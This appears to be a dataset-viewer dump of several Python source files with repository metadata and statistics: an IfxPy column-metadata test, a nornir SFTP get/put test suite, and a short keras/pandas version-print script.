op = {IfxPy.ATTR_CASE: IfxPy.CASE_LOWER}
IfxPy.set_option(conn, op, 1)
result = IfxPy.columns(conn,None,None,"employee")
row = IfxPy.fetch_both(result)
value1 = None
value2 = None
value3 = None
value4 = None
if (row.has_key('TABLE_NAME')):
value1 = row['TABLE_NAME']
if (row.has_key('COLUMN_NAME')):
value2 = row['COLUMN_NAME']
if (row.has_key('table_name')):
value3 = row['table_name']
if (row.has_key('column_name')):
value4 = row['column_name']
print value1
print value2
print value3
print value4
#__END__
#__IDS_EXPECTED__
#employee
#empno
#None
#None
#employee
#empno
#None
#None
#None
#None
#employee
#empno
| 23.134021
| 74
| 0.65107
| 301
| 2,244
| 4.641196
| 0.192691
| 0.042949
| 0.068719
| 0.094488
| 0.727989
| 0.727989
| 0.710809
| 0.710809
| 0.710809
| 0.710809
| 0
| 0.026934
| 0.222371
| 2,244
| 96
| 75
| 23.375
| 0.773639
| 0.038324
| 0
| 0.8
| 0
| 0
| 0.128972
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0
| null | null | 0.014286
| 0.057143
| null | null | 0.171429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8f57931d63462ddb0973a18b2579425b67c0375
| 3,232
|
py
|
Python
|
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | 4
|
2020-01-19T16:29:19.000Z
|
2020-12-30T19:25:14.000Z
|
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | null | null | null |
tests/plugins/tasks/files/test_sftp.py
|
justinhaef/nornir
|
344fa4ead1edaec8f554323e267993f745ca701a
|
[
"Apache-2.0"
] | 3
|
2018-11-01T18:20:30.000Z
|
2020-04-10T20:12:36.000Z
|
import uuid
# from nornir.core.exceptions import NornirExecutionError, CommandError
from nornir.plugins.tasks import files
# import pytest
def get_file(task):
filename = "/tmp/{uuid}-{host.name}".format(uuid=uuid.uuid4(), host=task.host)
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/hostname", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/hostname", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/hostname", dst=filename
)
assert r
assert not r.changed
def get_directory(task):
filename = "/tmp/{uuid}-{host.name}".format(uuid=uuid.uuid4(), host=task.host)
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=False, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert r.changed, r.files_changed
r = task.run(
task=files.sftp, dry_run=True, action="get", src="/etc/terminfo/", dst=filename
)
assert r
assert not r.changed
class Test(object):
def test_sftp_put(self, nornir):
u = uuid.uuid4()
result = nornir.run(
files.sftp,
dry_run=True,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp,
dry_run=False,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp,
dry_run=True,
action="put",
src="README.md",
dst=f"/tmp/README-{u}.md",
)
assert result
for h, r in result.items():
assert not r.changed
def test_sftp_get(self, nornir):
result = nornir.run(get_file)
assert not result.failed
def test_sftp_put_directory(self, nornir):
u = uuid.uuid4()
result = nornir.run(
files.sftp, dry_run=True, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp, dry_run=False, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert r.changed, r.files_changed
result = nornir.run(
files.sftp, dry_run=True, action="put", src="./nornir", dst=f"/tmp/{u}"
)
assert result
for h, r in result.items():
assert not r.changed
def test_sftp_get_directory(self, nornir):
result = nornir.run(get_directory)
assert not result.failed
| 26.276423
| 88
| 0.564047
| 427
| 3,232
| 4.189696
| 0.124122
| 0.054779
| 0.080492
| 0.100615
| 0.857462
| 0.855785
| 0.824483
| 0.824483
| 0.812186
| 0.812186
| 0
| 0.001776
| 0.303218
| 3,232
| 122
| 89
| 26.491803
| 0.792629
| 0.02599
| 0
| 0.715789
| 0
| 0
| 0.092875
| 0.014631
| 0
| 0
| 0
| 0
| 0.273684
| 1
| 0.063158
| false
| 0
| 0.021053
| 0
| 0.094737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d1291c03a4ce04cc0b1eb8bb44083c98ab13569
| 93
|
py
|
Python
|
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
tests/test_python.py
|
mctrjalloh/algebra
|
21c0fa21dd0d313eb9fb6767c0d83c69bc55cdb0
|
[
"MIT"
] | null | null | null |
import keras
import pandas
print("keras version:")
print(keras.__version__)
print(pandas)
| 10.333333
| 24
| 0.774194
| 12
| 93
| 5.666667
| 0.416667
| 0.294118
| 0.5
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 93
| 8
| 25
| 11.625
| 0.829268
| 0
| 0
| 0
| 0
| 0
| 0.150538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.